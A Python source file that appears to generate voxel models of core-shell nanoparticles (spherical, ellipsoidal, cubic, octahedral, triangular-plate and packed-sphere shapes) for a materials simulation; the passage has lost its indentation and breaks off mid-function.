# this function is to generate interpenetrated spherical nanoparticles with a surfactant shell!!!!!!!!
def incoreshell_interpenesphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,rcarbonpt,radiuspt,rcarbonpd,radiuspd,distcentro,alloynumber):
div=float(radiusc/dl)
aa=0
# FIRST ELEMENT!
if(radiuspt>radiuspd):
largerr = rcarbonpt
else:
largerr = rcarbonpd
xx1 = ((radiuspt + (largerr-radiuspt))/dl-i);
# xx1 = ((radiuspt + (rcarbonpt-radiuspt))/dl-i);
yy1 = ((radiuspt+(rcarbonpt-radiuspt))/dl-j);
zz1 = ((radiuspt+(largerr-radiuspt))/dl-k+1);
# print(xx1)
# FIRST ELEMENT SHELL
xx2 = ((radiuspt+(largerr-radiuspt))/dl-i)
# xx2 = ((radiuspt+(rcarbonpt-radiuspt))/dl-i)
yy2 = ((radiuspt+(rcarbonpt-radiuspt))/dl-j)
zz2 = ((radiuspt+(largerr-radiuspt))/dl-k+1)
# SECOND ELEMENT !
xx3 = ((radiuspd+(largerr-radiuspd))/dl-i+1)
# xx3 = ((radiuspd+(rcarbonpd-radiuspd))/dl-i+1)
yy3 = ((radiuspd+(rcarbonpd-radiuspd)+distcentro)/dl-j+1)
zz3 = ((radiuspd+(largerr-radiuspd))/dl-k+1)
# SECOND ELEMENT SHELL
xx4 = ((radiuspd+(largerr-radiuspd))/dl-i+1)
# xx4 = ((radiuspd+(rcarbonpd-radiuspd))/dl-i+1)
yy4 = ((radiuspd+(rcarbonpd-radiuspd)+distcentro)/dl-j+1)
zz4 = ((radiuspd+(largerr-radiuspd))/dl-k+1)
em=1
if (distcentro>rcarbonpt+rcarbonpd):
if ( ((xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2) <= (((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2) ):
index=corenumber
aa=1
# print (aa)
elif ((xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 >= ((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 <= 1.0):
index=cnum
aa=1
elif ((xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2):
index=shellnumber
aa=1
elif ((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 >= ((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 <= 1.0):
index=cnum
aa=1
if (em == 1 and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2)+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>1.0 or (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2
+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<(((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2) ) ) :
index=corenumber
aa=1
em=1
#xy(i,j+(k-1)*(Dy1))=1
elif (em == 1 and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2
+(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and ((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2
+(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=1.0)):
em=1
index=corenumber
aa=1
#xy(i,j+(k-1)*(Dy1))=1
elif (em == 1 and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2
+(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2
+(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2):
em=1
index=alloynumber
aa=1
#xy(i,j+(k-1)*(Dy1))=3
# NOW FOR PT CARBON SHELL, i changed here
if ((em == 1 and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2
+(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2>=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx2/((radiuspt + (rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<= 1.0 and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2 )
or ((xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2)>=1.0))):
em=1
index= cnum
aa=1
#xy(i,j+(k-1)*(Dy1))=4
elif (em == 1 and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 >=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2<= 1.0
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 +
(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2>=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=1.0):
em=1
index=cnum
aa=1
#xy(i,j+(k-1)*(Dy1))=4
elif (em == 1 and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 >=((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 <= 1.0
and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=(((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2) ):
em=1
index= shellnumber
aa=1
#xy(i,j+(k-1)*(Dy1))=2
# just PD SPHERE! i changed here
if (em == 1 and (xx3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz3/((radiuspd+(rcarbonpd-radiuspd))/dl))**2<=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2>((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and (((xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2< ((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
or ((xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2>1.0)))):
em=1
index=shellnumber
aa=1
#xy(i,j+(k-1)*(Dy1))=2
# JUST PD CARBON SHELL, i changed here
if ((em == 1 and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 >=((radiuspd)/(radiuspd+(rcarbonpd-radiuspd)))**2
and (xx4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+(yy4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2+
(zz4/((radiuspd+(rcarbonpd-radiuspd))/dl))**2 <= 1.0 and (xx1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(yy1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz1/((radiuspt+(rcarbonpt-radiuspt))/dl))**2>((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2
and ( ((xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
(zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2 < ((radiuspt)/(radiuspt+(rcarbonpt-radiuspt)))**2 )
or (( (xx2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+(yy2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2+
((zz2/((radiuspt+(rcarbonpt-radiuspt))/dl))**2) > 1.0))))):
em=1
index=cnum
aa=1
#xy(i,j+(k-1)*(Dy1))=4
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
###########################################################################################################################
###########################################################################################################################
# define a function that determines whether the position x,y,z is inside the core-shell
# this function is to generate ellipsoidal nanoparticles
def incoreshell_ellipsoid(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
div1=float(radiusxcs/dl)
div2=float(radiusycs/dl)
div3=float(radiuszcs/dl)
# x[ii]= float((((float((1-(g-1)*sqrt(3.0)+Npiy)))*div-i+2)))
# y[ii]= float(((float((-1+1-(g-1)+2*(w-1)+Npiy))*div-j)+2))
# z[ii]= float(((float((sqrt(3.0)*(h-1)+1))*div-k+2)))
# print (x[ii])
aa=0
if ( ((x[ii]/(div1))**2+(y[ii]/(div2))**2+(z[ii]/(div3))**2) <= (((float(radiuscore))/(float(radiusc)))**2) ):
# A[a][b]=corenumber
index=corenumber
aa=1
# shell
if ( (((x[ii]/(div1))**2+(y[ii]/(div2))**2+ (z[ii]/(div3))**2) >= (((float(radiuscore))/(float(radiusc)))**2)) and (((x[ii]/(div1))**2+(y[ii]/(div2))**2+ (z[ii]/(div3))**2) <= (((float(radiusshell))/(float(radiusc)))**2))):
# A[a][b]=shellnumber
index=shellnumber
aa=1
# carbon shell
if ( (((x[ii]/((div1)))**2+(y[ii]/((div2)))**2+ (z[ii]/((div3)))**2) >= (((float(radiusshell))/(float(radiusc)))**2)) and (((x[ii]/((div1)))**2+(y[ii]/((div2)))**2+ (z[ii]/((div3)))**2) <= ((1.0)**2))):
# A[a][b]=cnum
index=cnum
aa=1
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
###########################################################################################################################
###########################################################################################################################
# define a function that determines whether the position x,y,z is inside the core-shell
# this function is to generate cubic nanoparticles
def incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z):
div=float(radiusc/dl)
# print (x[ii])
aa=0
# core
acore=(x[ii]/(div))**2 <= (((float(radiuscore))/(float(radiusc)))**2) and (y[ii]/(div))**2 <= (((float(radiuscore))/(float(radiusc)))**2) and (z[ii]/(div))**2<= (((float(radiuscore))/(float(radiusc)))**2)
if ( acore ):
# A[a][b]=corenumber
index=corenumber
aa=1
# shell
# a1x= (x[ii]/(div))**2>= ((float(radiuscore))/(float(radiusc)))**2 and (x[ii]/(div))**2<= ((float(radiusshell))/(float(radiusc)))**2
# a1y= (y[ii]/(div))**2 >= ((float(radiuscore))/(float(radiusc)))**2 and (y[ii]/(div))**2 <= ((float(radiusshell))/(float(radiusc)))**2
# a1z= (z[ii]/(div))**2 >= ((float(radiuscore))/(float(radiusc)))**2 and (z[ii]/(div))**2 <= ((float(radiusshell))/(float(radiusc)))**2
ashell= (x[ii]/(div))**2<= ((float(radiusshell))/(float(radiusc)))**2 and (y[ii]/(div))**2 <= ((float(radiusshell))/(float(radiusc)))**2 and (z[ii]/(div))**2 <= ((float(radiusshell))/(float(radiusc)))**2
if ( ashell and acore==False):
# if ( 1==1):
# A[a][b]=shellnumber
index=shellnumber
aa=1
# carbon shell
# a1= (x[ii]/(div))**2>= ((float(radiusshell))/(float(radiusc)))**2 and (y[ii]/(div))**2 >= ((float(radiusshell))/(float(radiusc)))**2 and (z[ii]/(div))**2 >= ((float(radiusshell))/(float(radiusc)))**2
# a2= (x[ii]/(div))**2<=1.0 and (y[ii]/(div))**2 <= 1.0 and (z[ii]/(div))**2 <= 1.0
acarbon=(x[ii]/(div))**2<=1.0 and (y[ii]/(div))**2 <= 1.0 and (z[ii]/(div))**2 <= 1.0
if ( ashell==False and acarbon==True):
# A[a][b]=cnum
index=cnum
aa=1
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
###########################################################################################################################
###########################################################################################################################
# define a function that determines whether the position x,y,z is inside the core-shell
# this function is to generate octahedral nanoparticles
def incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z):
div=float(radiusc/dl)
# print (x[ii])
aa=0
# core
acore=abs(x[ii]/(div))+abs(y[ii]/(div))+abs(z[ii]/(div))<= (((float(radiuscore))/(float(radiusc)))**2)
if ( acore ):
# A[a][b]=corenumber
index=corenumber
aa=1
# shell
ashell= abs(x[ii]/(div))+abs(y[ii]/(div))+abs(z[ii]/(div))<= (((float(radiusshell))/(float(radiusc)))**2)
if ( ashell and acore==False ):
# A[a][b]=shellnumber
index=shellnumber
aa=1
# carbon shell
acarbon= abs(x[ii]/(div))+abs(y[ii]/(div))+abs(z[ii]/(div))<= (((float(radiusc))/(float(radiusc)))**2)
if ( acarbon and ashell == False ):
# A[a][b]=cnum
index=cnum
aa=1
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
return index,aa
###########################################################################################################################
###########################################################################################################################
# define a function that determines whether the position x,y,z is inside the core-shell
# this function is to generate triangular-plate nanoparticles
def incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs):
#### the equations below build a triangular-plate nanoparticle
### this still needs to be fixed
div=float(radiusc/dl)
basenew= base2+cs
widthnew=width2+cs
aa=0
acore1=False
acore2=False
if( y[ii]/div <= width/(2*widthnew)+abs(x[ii]/div)*(width*(basenew)/base*(widthnew)) and y[ii]>=0):
# print (x[ii],base/2)
acore1=True
# print (x[ii],base/2)
# x[ii]= float((((float(2.0*(g-1)+1+(h-1)))*float(radiusc)/float(dl)-float(i)
# if( (x[ii]+float(i))/div <=x[ii]/div<= base/(2*basenew)):
# if( (y[ii]+float(j))/div <=width/widthnew-i*(2*width*(basenew)/(base*widthnew))):
# print (x[ii],base/2)
# acore1=True
# if( -base/(2*basenew) <= x[ii]/div <= 0 ):
# if( y[ii]/div <=width/widthnew+(x[ii]/div)*(2*width*(basenew)/(base*widthnew))):
# acore2= True
#
acore2=False
if ( acore1 or acore2 ):
# print (x[ii],base/2)
# A[a][b]=corenumber
index=corenumber
index=0
aa=1
# print(index)
ashell1=False
ashell2=False
if( 0 <=x[ii]<= base2/2):
if( y[ii]<=width2-x[ii]*(2*width2/base2)):
ashell1=True
if( -base2/2 <= x[ii] <= 0 ):
if( y[ii]<=width2+x[ii]*(2*width2/base2)):
ashell2= True
aant=True
if (acore1==False and acore2==False):
aant=False
if ( ashell1 or ashell2 and ( aant==False) ):
# A[a][b]=corenumber
index=shellnumber
aa=1
# print(index)
acnum1=False
acnum2=False
basenew= base2+cs
widthnew=width2+cs
if( 0 <=x[ii]<= basenew/2):
if( y[ii]<=widthnew-x[ii]*(2*widthnew/basenew)):
acnum1=True
if( -base2/2 <= x[ii] <= 0 ):
if( y[ii]<=widthnew+x[ii]*(2*widthnew/basenew)):
acnum2= True
aant=True
if (ashell1==False and ashell2==False):
aant=False
if ( acnum1 or acnum2 and ( aant==False) ):
# A[a][b]=corenumber
index=cnum
index=0
aa=1
# print(index)
# shell
# print (x[ii])
# core
if(aa==0):
index=0
if(aa==1):
pass
# print (index,'index')
# print(index)
return index,aa
###########################################################################################################################
# initial conditions of the created arrays
def zeroarray(Npix,Npiy,Ntam):
#jj=1
#w=Npiy
#g=Npix
if(Npix>Npiy):
Nmaior=Npix
else:
Nmaior=Npiy
Npart=0
for h in range(0,(Nmaior+1)):
Npart=Npart+Nmaior**2
Npartz=0
for h in range(0,(Ntam+1)):
Npartz=Ntam+h**2
if(Npart> Npartz):
pass
else:
Npart=Npartz
# print Npart,'Npart'
x= [0 for i in range(Npart+1)]
y= [0 for i in range(Npart+1)]
z= [0 for i in range(Npart+1)]
return [x, y, z, Npart] #=[x,y,z,Npart]
#[x, y, z, Npart] = zeroarray(10, 1)
###########################################################################################################################
### create the matrix and zero it out
def zeromatrix(Dx1,Dy1,Dz1):
mult=(Dy1)*(Dz1)
#print (Dx1)
A= [[0 for i in range(mult+1)] for j in range(Dx1+1)]
#print A[Dx1][mult]
#print len(A)
#A=[[]]
for k in range(1,(Dz1+1)):
for j in range(1,(Dy1+1)):
for i in range(1,Dx1+1):
A[i][j+(k-1)*Dy1]=0
# A[i][j]=0
# print i
return A
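# Illustrative note (added): zeromatrix allocates A with (Dy1*Dz1)+1 columns so
# the rest of the code can address voxels as A[i][j+(k-1)*Dy1], i.e. the y and
# z indices are flattened into a single column index. For example, with Dy1=5
# the voxel (i=2, j=3, k=4) is stored at A[2][3+(4-1)*5] = A[2][18].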
###########################################################################################################################
# function or class that describes which geometry will be chosen.
# for now this will be done with functions
def jonderstruct1 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
w=0
g=0
h=0
# print(corenumber,'aqui')
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
#############
xx1=((1)*float(radiusc/dl)-i+1)
yy1= ((1)*float(radiusc/dl)-j+1)
zz1=(float(radiusc/dl)-k+1)
xx2=((1.0)*float(radiusc/dl)-i+1)
yy2= ((3.0)*float(radiusc/dl)-j+1)
zz2=(float(radiusc/dl)-k+1)
xx3=((3.0)*float(radiusc/dl)-i+1)
yy3= ((1.0)*float(radiusc/dl)-j+1)
zz3=(float(radiusc/dl)-k+1)
xx4=((3.0)*float(radiusc/dl)-i+1)
yy4= ((3.0)*float(radiusc/dl)-j+1)
zz4=(float(radiusc/dl)-k+1)
#!!! second layer, one sphere
xx5=((2.0)*float(radiusc/dl)-i+1)
yy5= ((2.0)*float(radiusc/dl)-j+1)
zz5=((sqrt(2.0)+1.0)*float(radiusc/dl)-k+1)
#!!! third layer, four spheres
xx6=(1*float(radiusc/dl)-i+1)
yy6= (1*float(radiusc/dl)-j+1)
zz6=((sqrt(3.0)+2.0)*float(radiusc/dl)-k+1)
xx7=(1*float(radiusc/dl)-i+1)
yy7= (3*float(radiusc/dl)-j+1)
zz7=((sqrt(3.0)+2.0)*float(radiusc/dl)-k+1)
xx8=(3*float(radiusc/dl)-i+1)
yy8= (1*float(radiusc/dl)-j+1)
zz8=((sqrt(3.0)+2.0)*float(radiusc/dl)-k+1)
xx9=(3*float(radiusc/dl)-i+1)
yy9= (3*float(radiusc/dl)-j+1)
zz9=((sqrt(3.0)+2.0)*float(radiusc/dl)-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
ii=ii+1
return A
###########################################################################################################################
###########################################################################################################################
def jonderstruct2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs,cs):
w=0
g=0
h=0
# print(corenumber,'aqui')
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
xx1=((1.0)*float(radiusc/dl)-i+1)
yy1= ((1.0)*float(radiusc/dl)-j+1)
zz1=(float(radiusc/dl)-k+1)
xx2=((2.0+sqrt(3.0))*float(radiusc/dl)-i+1)
yy2= ((1.0)*float(radiusc/dl)-j+1)
zz2=(float(radiusc/dl)-k+1)
xx3=((1.0)*float(radiusc/dl)-i+1)
yy3= ((2.0+sqrt(3.0)) *float(radiusc/dl)-j+1)
zz3=(float(radiusc/dl)-k+1)
xx4=((2+sqrt(3.0))*float(radiusc/dl)-i+1)
yy4= ((2+sqrt(3.0))*float(radiusc/dl)-j+1)
zz4=(float(radiusc/dl)-k+1)
xx5=((1.0+sqrt(2.0))*float(radiusc/dl)-i+1)
yy5= ((1.0+sqrt(2.0))*float(radiusc/dl)-j+1)
zz5=(float(radiusc/dl)-k+1)
#!!!!
xx6=(1.0*float(radiusc/dl)-i+1)
yy6= (1.0*float(radiusc/dl)-j+1)
zz6=((2+sqrt(3.0))*float(radiusc/dl)-k+1)
xx7=((2+sqrt(3.0))*float(radiusc/dl)-i+1)
yy7= (1*float(radiusc/dl)-j+1)
zz7=((2+sqrt(3.0))*float(radiusc/dl)-k+1)
xx8=((1+sqrt(2.0))*float(radiusc/dl)-i+1)
yy8= ((1)*float(radiusc/dl)-j+1)
zz8=((1+sqrt(2.0))*float(radiusc/dl)-k+1)
xx9=((1.0)*float(radiusc/dl)-i+1)
